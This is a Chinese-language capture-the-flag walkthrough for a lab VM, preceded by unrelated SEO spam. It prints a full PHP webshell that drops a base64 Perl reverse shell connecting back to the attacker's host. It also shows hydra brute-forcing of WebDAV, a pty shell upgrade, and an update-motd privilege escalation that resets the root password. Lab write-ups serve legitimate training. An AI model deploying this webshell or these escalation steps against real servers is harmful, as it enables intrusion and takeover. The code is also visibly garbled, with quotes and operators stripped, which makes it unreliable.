搜h网站技巧,网络营销课程免费,公司网页怎么设计,优秀校园景观设计靶机下载链接:
https://pan.baidu.com/s/1GxcSL6efwd0GcbY45WsD0A 提取码: dhr5
一、信息收集
1.使用namp 192.168.101.0/24扫描该网段的地址#xff0c;寻找靶机IP 2.直接访问192.168.101.102 3.进行目录扫描#xff0c;dirb目录扫描工具#xff08;kali自带的#xff…靶机下载链接:
https://pan.baidu.com/s/1GxcSL6efwd0GcbY45WsD0A 提取码: dhr5
一、信息收集
1.使用namp 192.168.101.0/24扫描该网段的地址寻找靶机IP 2.直接访问192.168.101.102 3.进行目录扫描dirb目录扫描工具kali自带的使用命令dirb http//192.168.101.102,扫描后发现有3个网址发现有webdav网址 二、利用webdav客户端思路cadaver http://192.168.101.102/webdav——连接Put webshell.php——上传木马 使用cewl——爬行网站创建密码字典使用方法 cewl 192.168.101.102 -w 1.txt 使用hydra自动化爆破工具使用方法 hydra -L 1.txt -P 1.txt 192.168.101.102 http-get /webdav 用爆破的用户密码成功登录 上传一个webshell.php文件
Webshell.php文件源码如下
?php
function which($pr) {
$path execute(which $pr);
return ($path ? $path : $pr);
}
function execute($cfe) {
$res ;
if ($cfe) {
if(function_exists(exec)) {
exec($cfe,$res);
$res join(\n,$res);
} elseif(function_exists(shell_exec)) {
$res shell_exec($cfe);
} elseif(function_exists(system)) {
ob_start();
system($cfe);
$res ob_get_contents();
ob_end_clean();
} elseif(function_exists(passthru)) {
ob_start();
passthru($cfe);
$res ob_get_contents();
ob_end_clean();
} elseif(is_resource($f popen($cfe,r))) {
$res ;
while(!feof($f)) {
$res . fread($f,1024);
}
pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fpfopen($fname,w)) {
fputs($fp,base64_decode($text));
fclose($fp);
}
}
$yourip 192.168.101.102; 注意这里是kali的ip
$yourport 4444;
$usedb array(perlperl,cc);
$back_connectIyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj.
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR.
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT.
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI.
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi.
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl.
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw;
cf(/tmp/.bc,$back_connect);
$res execute(which(perl). /tmp/.bc $yourip $yourport );
?
使用put webshell.php上传注意webshell路径 上传成功之后需要访问192.168.101.102建立反向连接访问网站之前开启监听监听命方法如下nc -lvvp 4444 使用之前爆破的用户密码登录接着查看监听情况 看到如下情况说明成功回弹websshell 优化命令执行终端执行下面命令进入python交互式(注意要下载python环境才能运行):
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ 查看当前用户使用命令 cd /home 、ls(发现3个用户) 在mnt目录下面发现了hell.sh文件发现brainfuck to text编码进行解码得到chitragupt猜测是密码
解码网站https://www.splitbrain.org/services/ook 使用命令ssh进行连接具体方法ssh inferno192.168.101.102 查看该用户的文件发现有个user.txt,查看该文件发现一个flag 三、Motd提权
具体步骤1.进入到文件夹/etc/update-mode.d/
2修改文件 echo echo root:admin|sudo chpasswd00-header
3.重新登录4.su root
root:toor| sudo chpasswd 拿到root权限后查看有什么文件有发现一个txt文件查看发现有flag
